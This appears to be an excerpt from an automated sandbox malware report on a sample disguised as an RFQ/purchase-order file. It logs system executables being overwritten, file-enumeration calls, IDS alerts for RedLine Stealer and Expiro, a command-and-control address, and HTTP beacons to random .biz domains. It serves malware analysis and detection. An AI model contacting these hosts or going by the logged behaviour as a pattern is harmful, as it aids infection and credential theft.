Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\Spectrum.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\Locator.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\SysWOW64\perfhost.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\msiexec.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\VSSVC.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\wbengine.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\SearchIndexer.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\TieringEngineService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\AgentService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior

Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452126
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,	0_2_0045C999
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00436ADE
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00434BEE
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,	0_2_00436D2D
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442E1F
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0045DD7C FindFirstFileW,FindClose,	0_2_0045DD7C
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD29
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00475FE5
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 0_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8D
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_00452126
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0045C999 FindFirstFileW,FindNextFileW,FindClose,	2_2_0045C999
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00436ADE
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00434BEE
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle,	2_2_00436D2D
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00442E1F
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0045DD7C FindFirstFileW,FindClose,	2_2_0045DD7C
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0044BD29 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	2_2_0044BD29
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_00475FE5
Source: C:\Users\user\Desktop\RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Code function: 2_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0044BF8D

Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\microsofts.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 068E62FBh	11_2_068E60C8
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 068E6CEBh	11_2_068E6A28
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 068E9C18h	11_2_068E9720
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 4x nop then jmp 068E7813h	11_2_068E7550
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 024E7394h	12_2_024E7188
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 024E78DCh	12_2_024E7688
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	12_2_024E7E60
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then jmp 024E78DCh	12_2_024E767B
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	12_2_024E7E5B

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.4:49736 -> 212.162.149.53:2049
Source: Network traffic	Suricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.4:49736 -> 212.162.149.53:2049
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:61199 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 212.162.149.53:2049 -> 192.168.2.4:49736
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49740 -> 18.141.10.107:80
Source: Network traffic	Suricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 212.162.149.53:2049 -> 192.168.2.4:49736
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:53926 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:53837 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:50249 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49895 -> 13.251.16.150:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 212.162.149.53:2049

Queries random domain names (often used to prevent blacklisting and sinkholes)

Source: unknown

DNS traffic detected: English language letter frequency does not match the domain names

Source: unknown

Network traffic detected: DNS query count 47

Source: global traffic	TCP traffic: 192.168.2.4:49736 -> 212.162.149.53:2049
Source: global traffic	TCP traffic: 192.168.2.4:49741 -> 51.195.88.199:587

Source: Joe Sandbox View	IP Address: 165.160.15.20 165.160.15.20
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 3.94.10.34 3.94.10.34

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.4:49735
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.4:49735
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.4:49806
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.4:49806
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:49827
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:49827
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.4:49988
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.4:49988
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.213.104.86:80 -> 192.168.2.4:50145
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.213.104.86:80 -> 192.168.2.4:50145

Source: global traffic

TCP traffic: 192.168.2.4:49741 -> 51.195.88.199:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /atfsybxv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /gdxe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dggpmrspif HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /tynxrhlkri HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /mrl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /kngubkdkj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /smyj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /jvvbexlpmq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vpc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /xefutga HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jhywesavwlgnui HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /vuxecawgb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jeppo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
